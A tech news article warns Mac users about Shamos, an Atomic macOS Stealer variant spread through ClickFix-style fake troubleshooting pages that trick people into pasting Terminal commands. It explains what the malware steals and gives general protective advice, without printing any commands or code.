Cybersecurity experts have identified a new malicious campaign targeting Mac users worldwide. The malware, dubbed Shamos, is a sophisticated variant of the Atomic macOS Stealer (AMOS), and is believed to be developed by a cybercriminal group known as COOKIE SPIDER. This threat exploits users’ trust by disguising itself as legitimate troubleshooting assistance, making it a rising concern for Apple device owners.

How Shamos Tricks Mac Users with Fake Fixes

The attack technique, known as ClickFix, preys on users searching for solutions to common Mac issues. Victims are directed to counterfeit websites or GitHub repositories that mimic official support pages. These sites prompt users to copy a single line of code into the Terminal app, claiming to fix errors. However, executing this command silently downloads Shamos, evades macOS Gatekeeper protections, and installs malicious components without detection.

What Does Shamos Do Once Inside?

After infiltration, Shamos scans the system for sensitive information, including Apple Notes, stored passwords in Keychain, browser credentials, and even cryptocurrency wallets. The malware compresses the stolen data and transmits it directly to cybercriminals. It often accompanies additional malicious payloads such as botnet modules or fake wallet applications, further compromising the user’s security.

Deceptive Websites and How They Operate

Fake tech support sites like mac-safer[.]com or rescue-mac[.]com distribute these malicious “fixes” through malvertising campaigns. These pages are designed to appear as trustworthy troubleshooting guides and often rank high in search results for queries like “how to flush resolver cache.” They instruct users to run dangerous Bash scripts that can extract passwords, disable security measures, and initiate the Shamos malware, which can persistently restart with the system to maintain control.

Protecting Your Mac from Evolving Threats

To avoid falling victim to Shamos and similar malware, users should exercise caution before executing commands found online. If a command appears on a website, forum, or GitHub, verify its safety through official Apple support resources or reputable tech communities. Always be skeptical of sponsored search results that promote dubious troubleshooting sites, as these are often malicious traps.

While GitHub is a valuable platform for developers, it also hosts malicious repositories that mimic legitimate tools. Users should scrutinize repository details such as publisher reputation, star ratings, and activity history before downloading any files. Using reliable antivirus software adds an extra layer of defense by detecting suspicious activities and blocking malicious scripts before they execute.

Additional Security Measures

Reducing your online footprint can help limit the impact of data theft. Data removal services can scan and eliminate your personal information from broker sites, making it more difficult for attackers to exploit data post-breach. Keeping your macOS up to date is equally important; Apple regularly releases patches that fix vulnerabilities exploited by malware like Shamos. Enable automatic updates to ensure your system always has the latest security enhancements.

Stay Vigilant and Informed

Remember, cybercriminals capitalize on urgency—be cautious when searching for quick fixes or downloading tools. If something doesn’t feel right, pause and verify through official sources. Protecting your Mac requires a combination of cautious behavior, system updates, and security tools designed to detect and block evolving threats like Shamos.

Ethan Cole

I'm Ethan Cole, a tech journalist with a passion for uncovering the stories behind innovation. I write about emerging technologies, startups, and the digital trends shaping our future. Read me on x.com